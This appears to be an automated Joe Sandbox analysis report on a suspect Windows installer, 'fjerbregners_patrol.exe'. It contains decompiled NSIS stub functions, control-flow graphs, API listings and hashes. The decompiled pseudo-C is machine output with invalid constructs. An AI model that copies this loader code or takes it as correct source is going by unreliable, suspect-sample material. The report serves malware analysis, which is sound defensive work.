					__eflags =  *0x41f5e0; // 0x41
					if(__eflags == 0) {
						E00406776(__ecx, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M004084CE, 0x41f5e0, 0);
					}
					lstrcatA("1033", 0x41f5e0);
				} else {
					E00406408("1033",  *_t16() & 0x0000ffff);
				}
				E00405804(_t74, _t88);
				_t85 = "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne";
				 *0x4240dc = 0x10000;
				 *0x4240c0 =  *0x42400c & 0x00000020;
				if(E00406421(_t88, _t85) != 0) {
					L16:
					if(E00406421(_t96, _t85) == 0) {
						_push( *((intOrPtr*)(_t78 + 0x118)));
						_push(_t85);
						E00405D47();
					}
					_t24 = LoadImageA( *0x4237f4, 0x67, "true", 0, 0, 0x8040); // executed
					_t75 = _t24;
					 *0x4237d8 = _t75;
					if( *((intOrPtr*)(_t78 + 0x50)) == 0xffffffff) {
						L22:
						__eflags = E00401533(0);
						if(__eflags != 0) {
							L32:
							_t26 = 2;
							return _t26;
						}
						_t27 = E00405804(_t75, __eflags);
						__eflags =  *0x4240e0;
						if( *0x4240e0 != 0) {
							_t28 = E004056E9(_t27, 0);
							__eflags = _t28;
							if(_t28 == 0) {
								E00401533("true");
								goto L20;
							}
							__eflags =  *0x4237ec; // 0x0
							if(__eflags == 0) {
								E00401533(2);
							}
							goto L32;
						}
						ShowWindow( *0x4205e8, 5); // executed
						_t33 = E0040604A("RichEd20"); // executed
						__eflags = _t33;
						if(_t33 == 0) {
							E0040604A("RichEd32");
						}
						_t34 = GetClassInfoA(0, "RichEdit20A", 0x4237a0);
						__eflags = _t34;
						if(_t34 == 0) {
							GetClassInfoA(0, "RichEdit", 0x4237a0);
							 *0x4237c4 = "RichEdit20A";
							RegisterClassA(0x4237a0);
						}
						_t35 =  *0x4237d4; // 0x0
						_t38 = DialogBoxParamA( *0x4237f4, _t35 + 0x00000069 & 0x0000ffff, 0, E00404E83, 0); // executed
						E00403C2A(E00401533(5), "true");
						return _t38;
					} else {
						_t45 =  *0x4237f4; // 0x400000
						_t83 = "_Nb";
						 *0x4237a4 = E00401000;
						 *0x4237b0 = _t45;
						 *0x4237b4 = _t75;
						 *0x4237c4 = _t83;
						if(RegisterClassA(0x4237a0) != 0) {
							SystemParametersInfoA(0x30, 0,  &_v16, 0);
							_t52 = _v8 - _v16;
							__eflags = _t52;
							 *0x4205e8 = CreateWindowExA(0x80, _t83, 0, 0x80000000, _v16, _v12, _t52, _v4 - _v12, 0, 0,  *0x4237f4, 0);
							goto L22;
						}
						L20:
						return 0;
					}
				} else {
					_t77 =  *((intOrPtr*)(_t78 + 0x48));
					_t90 = _t77;
					if(_t77 == 0) {
						goto L16;
					}
					_t76 =  *0x424038;
					_t84 = 0x422fa0;
					E00406776( *0x424038, _t90,  *((intOrPtr*)(_t78 + 0x44)), _t77 + _t76,  *((intOrPtr*)(_t78 + 0x4c)) + _t76, 0x422fa0, 0);
					_t59 =  *0x422fa0; // 0x43
					if(_t59 == 0) {
						goto L16;
					}
					if(_t59 == 0x22) {
						_t84 = 0x422fa1;
						 *((char*)(E004063E4(0x422fa1, 0x22))) = 0;
					}
					_t62 = lstrlenA(_t84) + 0xfffffffc + _t84;
					if(_t62 <= _t84 || lstrcmpiA(_t62, ".exe") != 0) {
						L15:
						E0040690A(_t85, E00406346(_t84));
						goto L16;
					} else {
						_t66 = GetFileAttributesA(_t84);
						if(_t66 == 0xffffffff) {
							L14:
							E00406AC2(_t84);
							goto L15;
						}
						_t96 = _t66 & 0x00000010;
						if((_t66 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























                                                                                                                                                                                            0x004058c3
                                                                                                                                                                                            0x004058ca
                                                                                                                                                                                            0x004058d2
                                                                                                                                                                                            0x004058d9
                                                                                                                                                                                            0x004058db
                                                                                                                                                                                            0x004058f5
                                                                                                                                                                                            0x0040590a
                                                                                                                                                                                            0x00405910
                                                                                                                                                                                            0x00405915
                                                                                                                                                                                            0x0040591b
                                                                                                                                                                                            0x0040592e
                                                                                                                                                                                            0x0040592e
                                                                                                                                                                                            0x00405939
                                                                                                                                                                                            0x004058dd
                                                                                                                                                                                            0x004058e8
                                                                                                                                                                                            0x004058e8
                                                                                                                                                                                            0x0040593e
                                                                                                                                                                                            0x00405948
                                                                                                                                                                                            0x00405950
                                                                                                                                                                                            0x0040595b
                                                                                                                                                                                            0x00405967
                                                                                                                                                                                            0x004059f1
                                                                                                                                                                                            0x004059f9
                                                                                                                                                                                            0x004059fb
                                                                                                                                                                                            0x00405a01
                                                                                                                                                                                            0x00405a02
                                                                                                                                                                                            0x00405a02
                                                                                                                                                                                            0x00405a18
                                                                                                                                                                                            0x00405a1e
                                                                                                                                                                                            0x00405a25
                                                                                                                                                                                            0x00405a35
                                                                                                                                                                                            0x00405ab4
                                                                                                                                                                                            0x00405aba
                                                                                                                                                                                            0x00405abc
                                                                                                                                                                                            0x00405b6e
                                                                                                                                                                                            0x00405b70
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405b70
                                                                                                                                                                                            0x00405ac2
                                                                                                                                                                                            0x00405ac7
                                                                                                                                                                                            0x00405acd
                                                                                                                                                                                            0x00405b56
                                                                                                                                                                                            0x00405b5b
                                                                                                                                                                                            0x00405b5d
                                                                                                                                                                                            0x00405b7b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405b7b
                                                                                                                                                                                            0x00405b5f
                                                                                                                                                                                            0x00405b65
                                                                                                                                                                                            0x00405b69
                                                                                                                                                                                            0x00405b69
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405b65
                                                                                                                                                                                            0x00405adb
                                                                                                                                                                                            0x00405ae6
                                                                                                                                                                                            0x00405aeb
                                                                                                                                                                                            0x00405aed
                                                                                                                                                                                            0x00405af4
                                                                                                                                                                                            0x00405af4
                                                                                                                                                                                            0x00405b06
                                                                                                                                                                                            0x00405b08
                                                                                                                                                                                            0x00405b0a
                                                                                                                                                                                            0x00405b13
                                                                                                                                                                                            0x00405b16
                                                                                                                                                                                            0x00405b20
                                                                                                                                                                                            0x00405b20
                                                                                                                                                                                            0x00405b22
                                                                                                                                                                                            0x00405b3b
                                                                                                                                                                                            0x00405b4c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405a37
                                                                                                                                                                                            0x00405a37
                                                                                                                                                                                            0x00405a3c
                                                                                                                                                                                            0x00405a42
                                                                                                                                                                                            0x00405a4c
                                                                                                                                                                                            0x00405a51
                                                                                                                                                                                            0x00405a57
                                                                                                                                                                                            0x00405a62
                                                                                                                                                                                            0x00405a74
                                                                                                                                                                                            0x00405a90
                                                                                                                                                                                            0x00405a90
                                                                                                                                                                                            0x00405aaf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405aaf
                                                                                                                                                                                            0x00405a64
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405a64
                                                                                                                                                                                            0x0040596d
                                                                                                                                                                                            0x0040596d
                                                                                                                                                                                            0x00405970
                                                                                                                                                                                            0x00405972
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405974
                                                                                                                                                                                            0x0040597a
                                                                                                                                                                                            0x0040598e
                                                                                                                                                                                            0x00405993
                                                                                                                                                                                            0x0040599a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040599e
                                                                                                                                                                                            0x004059a2
                                                                                                                                                                                            0x004059ad
                                                                                                                                                                                            0x004059ad
                                                                                                                                                                                            0x004059b8
                                                                                                                                                                                            0x004059bc
                                                                                                                                                                                            0x004059e4
                                                                                                                                                                                            0x004059ec
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004059ce
                                                                                                                                                                                            0x004059cf
                                                                                                                                                                                            0x004059d8
                                                                                                                                                                                            0x004059de
                                                                                                                                                                                            0x004059df
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004059df
                                                                                                                                                                                            0x004059da
                                                                                                                                                                                            0x004059dc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004059dc
                                                                                                                                                                                            0x004059bc

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 004066E5: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403751,0000000C), ref: 004066F3
                                                                                                                                                                                              • Part of subcall function 004066E5: GetProcAddress.KERNEL32(00000000), ref: 0040670F
                                                                                                                                                                                            • lstrcatA.KERNEL32(1033,Apteres Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Apteres Setup: Installing,00000000,00000002,00000000,756D3410,00000000,00000000), ref: 00405939
                                                                                                                                                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\drvelens\anskrevne,1033,Apteres Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Apteres Setup: Installing,00000000,00000002,00000000), ref: 004059B0
                                                                                                                                                                                            • lstrcmpiA.KERNEL32(-000000FC,.exe), ref: 004059C4
                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(Call), ref: 004059CF
                                                                                                                                                                                            • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\drvelens\anskrevne), ref: 00405A18
                                                                                                                                                                                              • Part of subcall function 00406408: wsprintfA.USER32 ref: 00406415
                                                                                                                                                                                            • RegisterClassA.USER32(004237A0), ref: 00405A5D
                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00405A74
                                                                                                                                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405AA9
                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405ADB
                                                                                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,004237A0), ref: 00405B06
                                                                                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit,004237A0), ref: 00405B13
                                                                                                                                                                                            • RegisterClassA.USER32(004237A0), ref: 00405B20
                                                                                                                                                                                            • DialogBoxParamA.USER32(?,00000000,00404E83,00000000), ref: 00405B3B
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$Apteres Setup: Installing$C:\Users\user\AppData\Roaming\drvelens\anskrevne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                            • API String ID: 1975747703-3897656908
                                                                                                                                                                                            • Opcode ID: 40d348d64f664ccbeb87850d1ea676c880036d2884e59266461091d9125db6e8
                                                                                                                                                                                            • Instruction ID: e39f9ad2a288a57160cd053718dbb51d12b6fc0718111869d4e70a28efb89621
                                                                                                                                                                                            • Opcode Fuzzy Hash: 40d348d64f664ccbeb87850d1ea676c880036d2884e59266461091d9125db6e8
                                                                                                                                                                                            • Instruction Fuzzy Hash: C26107B0300614BFDA206B65AE42F27366CEB44758B40413BF945B62D2DB7CAD028F7D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040329B Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 200memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 800 40329b-4032e7 GetTickCount GetModuleFileNameA call 40671a 803 4032f3-403323 call 40690a call 406ac2 call 40690a GetFileSize 800->803 804 4032e9-4032ee 800->804 812 403329 803->812 813 40341b-40342a call 4031f8 803->813 805 4034bd-4034c7 804->805 815 403330-403356 call 402f2a 812->815 818 403430-403432 813->818 819 4034b8 813->819 821 4034b0-4034b7 call 4031f8 815->821 822 40335c-403363 815->822 823 403434-40344c call 402f40 call 406747 818->823 824 40345b-4034a7 GlobalAlloc call 407a02 call 406851 CreateFileA 818->824 819->805 821->819 825 4033e1-4033e4 822->825 826 403365-40337e call 406498 822->826 846 403451-403453 823->846 850 4034a9-4034ae 824->850 851 4034ca-4034ff call 402f40 call 4030d6 824->851 834 4033e6-4033ed call 4031f8 825->834 835 4033ee-4033f4 825->835 826->835 843 403380-403388 826->843 834->835 836 4033f6-403405 call 406bca 835->836 837 403409-403411 835->837 836->837 837->815 845 403417 837->845 843->835 849 40338a-403392 843->849 845->813 846->819 852 403455-403459 846->852 849->835 853 403394-40339c 849->853 850->805 860 403504-403508 851->860 852->819 852->824 853->835 855 40339e-4033a6 853->855 855->835 857 4033a8-4033c7 855->857 857->819 859 4033cd-4033d3 857->859 859->845 862 4033d5-4033db 859->862 860->819 861 40350a-40351c 860->861 863 403524-403527 861->863 864 40351e 861->864 862->835 865 4033dd-4033df 862->865 866 40352a-403532 863->866 864->863 865->835 866->866 867 403534-40354e call 406498 866->867 867->805
                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                            			E0040329B(void* __eflags) {
				void* _t45;
				void* _t50;
				intOrPtr _t53;
				void* _t56;
				intOrPtr* _t58;
				intOrPtr _t59;
				signed int _t66;
				signed int _t68;
				signed int _t74;
				struct HINSTANCE__* _t80;
				signed int _t81;
				void* _t82;
				signed int _t89;
				intOrPtr _t91;
				signed int _t97;
				void* _t98;
				signed int _t99;
				void* _t100;
				signed int _t101;
				void* _t102;

				_t80 = 0;
				_t101 = 0;
				 *((intOrPtr*)(_t102 + 0x10)) = 0;
				 *0x424000 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Arthur\\Desktop\\fjerbregners_patrol.exe", 0x400);
				_t98 = E0040671A("C:\\Users\\Arthur\\Desktop\\fjerbregners_patrol.exe", 0x80000000, 3);
				 *0x40a010 = _t98;
				if(_t98 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040690A("C:\\Users\\Arthur\\Desktop", "C:\\Users\\Arthur\\Desktop\\fjerbregners_patrol.exe");
				E0040690A(0x42c000, E00406AC2("C:\\Users\\Arthur\\Desktop"));
				_t99 = GetFileSize(_t98, 0);
				 *0x40b538 = _t99;
				__eflags = _t99;
				if(_t99 == 0) {
					L21:
					E004031F8("true");
					__eflags =  *0x424008;
					_pop(_t82);
					if( *0x424008 == 0) {
						L28:
						return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
					}
					__eflags = _t101;
					if(_t101 == 0) {
						L25:
						_t45 = GlobalAlloc(0x40,  *(_t102 + 0x28)); // executed
						_t100 = _t45;
						E00407A02(0x40b548);
						E00406851(_t102 + 0x34, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t50 = CreateFileA(_t102 + 0x48, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a014 = _t50;
						__eflags = _t50 - 0xffffffff;
						if(_t50 != 0xffffffff) {
							_t53 = E00402F40( *0x424008 + 0x1c);
							 *0x40b530 = _t53;
							 *0x40b534 = _t53 - ( !( *(_t102 + 0x14)) & 0x00000004) +  *((intOrPtr*)(_t102 + 0x30)) + 0xffffffe4; // executed
							_t56 = E004030D6( *((intOrPtr*)(_t102 + 0x30)) + 0xffffffe4, 0xffffffff, 0, _t100,  *(_t102 + 0x28)); // executed
							__eflags = _t56 -  *(_t102 + 0x28);
							if(_t56 !=  *(_t102 + 0x28)) {
								goto L28;
							}
							__eflags =  *(_t102 + 0x14) & 0x00000001;
							 *0x424010 = _t100;
							 *0x42400c =  *_t100;
							if(( *(_t102 + 0x14) & 0x00000001) != 0) {
								 *0x424004 =  *0x424004 + 1;
								__eflags =  *0x424004;
							}
							_t89 = 8;
							_t31 = _t100 + 0x44; // 0x44
							_t58 = _t31;
							do {
								_t58 = _t58 - 8;
								 *_t58 =  *_t58 + _t100;
								_t89 = _t89 - 1;
								__eflags = _t89;
							} while (_t89 != 0);
							_t59 =  *0x40b52c; // 0xbc9c3
							 *((intOrPtr*)(_t100 + 0x3c)) = _t59;
							_t34 = _t100 + 4; // 0x4
							E00406498(0x424020, _t34, 0x40);
							return 0;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00402F40( *0x40b53c);
					_t66 = E00406747(_t82,  *0x40a010, _t102 + 0x14, 4); // executed
					__eflags = _t66;
					if(_t66 == 0) {
						goto L28;
					}
					__eflags = _t80 -  *((intOrPtr*)(_t102 + 0x10));
					if(_t80 !=  *((intOrPtr*)(_t102 + 0x10))) {
						goto L28;
					}
					goto L25;
				}
				_t81 =  *(_t102 + 0x138);
				while(1) {
					__eflags =  *0x424008;
					_t96 =  !=  ? 0x8000 : 0x200;
					__eflags = _t99 - 0x200;
					_t97 =  <  ? _t99 :  !=  ? 0x8000 : 0x200;
					_t68 = E00402F2A(0x40b5d0, 0x200);
					__eflags = _t68;
					if(_t68 == 0) {
						break;
					}
					__eflags =  *0x424008;
					if( *0x424008 != 0) {
						__eflags = _t81 & 0x00000002;
						if((_t81 & 0x00000002) == 0) {
							E004031F8(0);
						}
						L17:
						__eflags = _t99 -  *0x40b538; // 0x279e
						if(__eflags < 0) {
							 *((intOrPtr*)(_t102 + 0x10)) = E00406BCA( *((intOrPtr*)(_t102 + 0x18)), 0x40b5d0, _t97);
						}
						 *0x40b53c =  *0x40b53c + _t97;
						_t99 = _t99 - _t97;
						__eflags = _t99;
						if(_t99 != 0) {
							continue;
						} else {
							L20:
							_t80 =  *((intOrPtr*)(_t102 + 0x10));
							goto L21;
						}
					}
					E00406498(_t102 + 0x1c, 0x40b5d0, 0x1c);
					__eflags =  *(_t102 + 0x14) & 0xfffffff0;
					if(( *(_t102 + 0x14) & 0xfffffff0) != 0) {
						goto L17;
					}
					__eflags =  *((intOrPtr*)(_t102 + 0x18)) - 0xdeadbeef;
					if( *((intOrPtr*)(_t102 + 0x18)) != 0xdeadbeef) {
						goto L17;
					}
					__eflags =  *((intOrPtr*)(_t102 + 0x24)) - 0x74736e49;
					if( *((intOrPtr*)(_t102 + 0x24)) != 0x74736e49) {
						goto L17;
					}
					__eflags =  *((intOrPtr*)(_t102 + 0x20)) - 0x74666f73;
					if( *((intOrPtr*)(_t102 + 0x20)) != 0x74666f73) {
						goto L17;
					}
					__eflags =  *((intOrPtr*)(_t102 + 0x1c)) - 0x6c6c754e;
					if( *((intOrPtr*)(_t102 + 0x1c)) != 0x6c6c754e) {
						goto L17;
					}
					_t74 =  *0x40b53c; // 0x0
					_t81 = _t81 |  *(_t102 + 0x14);
					_t91 =  *((intOrPtr*)(_t102 + 0x2c));
					 *0x424008 = _t74;
					 *0x4240e0 =  *0x4240e0 | _t81 & 0x00000002;
					__eflags = _t91 - _t99;
					if(_t91 > _t99) {
						goto L28;
					}
					__eflags = (_t81 & 0x0000000c) - 4;
					if((_t81 & 0x0000000c) == 4) {
						goto L20;
					}
					_t99 = _t91 - 4;
					_t101 = _t101 + 1;
					__eflags = 0x200 - _t99;
					if(0x200 > _t99) {
						_t97 = _t99;
					}
					goto L17;
				}
				E004031F8("true");
				goto L28;
			}























                                                                                                                                                                                            0x004032a4
                                                                                                                                                                                            0x004032a6
                                                                                                                                                                                            0x004032a9
                                                                                                                                                                                            0x004032c4
                                                                                                                                                                                            0x004032c9
                                                                                                                                                                                            0x004032dc
                                                                                                                                                                                            0x004032de
                                                                                                                                                                                            0x004032e7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004032e9
                                                                                                                                                                                            0x004032fa
                                                                                                                                                                                            0x0040330b
                                                                                                                                                                                            0x00403319
                                                                                                                                                                                            0x0040331b
                                                                                                                                                                                            0x00403321
                                                                                                                                                                                            0x00403323
                                                                                                                                                                                            0x0040341b
                                                                                                                                                                                            0x0040341d
                                                                                                                                                                                            0x00403422
                                                                                                                                                                                            0x00403429
                                                                                                                                                                                            0x0040342a
                                                                                                                                                                                            0x004034b8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004034b8
                                                                                                                                                                                            0x00403430
                                                                                                                                                                                            0x00403432
                                                                                                                                                                                            0x0040345b
                                                                                                                                                                                            0x00403461
                                                                                                                                                                                            0x0040346c
                                                                                                                                                                                            0x0040346e
                                                                                                                                                                                            0x0040347d
                                                                                                                                                                                            0x00403499
                                                                                                                                                                                            0x0040349f
                                                                                                                                                                                            0x004034a4
                                                                                                                                                                                            0x004034a7
                                                                                                                                                                                            0x004034d3
                                                                                                                                                                                            0x004034e2
                                                                                                                                                                                            0x004034fa
                                                                                                                                                                                            0x004034ff
                                                                                                                                                                                            0x00403504
                                                                                                                                                                                            0x00403508
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040350a
                                                                                                                                                                                            0x0040350f
                                                                                                                                                                                            0x00403517
                                                                                                                                                                                            0x0040351c
                                                                                                                                                                                            0x0040351e
                                                                                                                                                                                            0x0040351e
                                                                                                                                                                                            0x0040351e
                                                                                                                                                                                            0x00403526
                                                                                                                                                                                            0x00403527
                                                                                                                                                                                            0x00403527
                                                                                                                                                                                            0x0040352a
                                                                                                                                                                                            0x0040352a
                                                                                                                                                                                            0x0040352d
                                                                                                                                                                                            0x0040352f
                                                                                                                                                                                            0x0040352f
                                                                                                                                                                                            0x0040352f
                                                                                                                                                                                            0x00403534
                                                                                                                                                                                            0x00403539
                                                                                                                                                                                            0x0040353c
                                                                                                                                                                                            0x00403547
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040354c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004034a9
                                                                                                                                                                                            0x0040343a
                                                                                                                                                                                            0x0040344c
                                                                                                                                                                                            0x00403451
                                                                                                                                                                                            0x00403453
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403455
                                                                                                                                                                                            0x00403459
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403459
                                                                                                                                                                                            0x00403329
                                                                                                                                                                                            0x00403330
                                                                                                                                                                                            0x00403330
                                                                                                                                                                                            0x00403341
                                                                                                                                                                                            0x00403344
                                                                                                                                                                                            0x00403346
                                                                                                                                                                                            0x0040334f
                                                                                                                                                                                            0x00403354
                                                                                                                                                                                            0x00403356
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040335c
                                                                                                                                                                                            0x00403363
                                                                                                                                                                                            0x004033e1
                                                                                                                                                                                            0x004033e4
                                                                                                                                                                                            0x004033e8
                                                                                                                                                                                            0x004033ed
                                                                                                                                                                                            0x004033ee
                                                                                                                                                                                            0x004033ee
                                                                                                                                                                                            0x004033f4
                                                                                                                                                                                            0x00403405
                                                                                                                                                                                            0x00403405
                                                                                                                                                                                            0x00403409
                                                                                                                                                                                            0x0040340f
                                                                                                                                                                                            0x0040340f
                                                                                                                                                                                            0x00403411
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403417
                                                                                                                                                                                            0x00403417
                                                                                                                                                                                            0x00403417
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403417
                                                                                                                                                                                            0x00403411
                                                                                                                                                                                            0x00403371
                                                                                                                                                                                            0x00403376
                                                                                                                                                                                            0x0040337e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403380
                                                                                                                                                                                            0x00403388
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040338a
                                                                                                                                                                                            0x00403392
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403394
                                                                                                                                                                                            0x0040339c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040339e
                                                                                                                                                                                            0x004033a6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004033a8
                                                                                                                                                                                            0x004033ad
                                                                                                                                                                                            0x004033b1
                                                                                                                                                                                            0x004033b5
                                                                                                                                                                                            0x004033bf
                                                                                                                                                                                            0x004033c5
                                                                                                                                                                                            0x004033c7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004033d1
                                                                                                                                                                                            0x004033d3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004033d5
                                                                                                                                                                                            0x004033d8
                                                                                                                                                                                            0x004033d9
                                                                                                                                                                                            0x004033db
                                                                                                                                                                                            0x004033dd
                                                                                                                                                                                            0x004033dd
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004033db
                                                                                                                                                                                            0x004034b2
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004032AD
                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fjerbregners_patrol.exe,00000400), ref: 004032C9
                                                                                                                                                                                              • Part of subcall function 0040671A: GetFileAttributesA.KERNELBASE(00000003,004032DC,C:\Users\user\Desktop\fjerbregners_patrol.exe,80000000,00000003), ref: 0040671E
                                                                                                                                                                                              • Part of subcall function 0040671A: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 0040673E
                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fjerbregners_patrol.exe,C:\Users\user\Desktop\fjerbregners_patrol.exe,80000000,00000003), ref: 00403313
                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403461
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\Desktop, xrefs: 004032F4, 004032F9, 004032FF
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403473
                                                                                                                                                                                            • C:\Users\user\Desktop\fjerbregners_patrol.exe, xrefs: 004032B8, 004032C2, 004032D6, 004032F3
                                                                                                                                                                                            • Inst, xrefs: 0040338A
                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004034B8
                                                                                                                                                                                            • Null, xrefs: 0040339E
                                                                                                                                                                                            • soft, xrefs: 00403394
                                                                                                                                                                                            • Error launching installer, xrefs: 004032E9
                                                                                                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032A8, 004034A9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
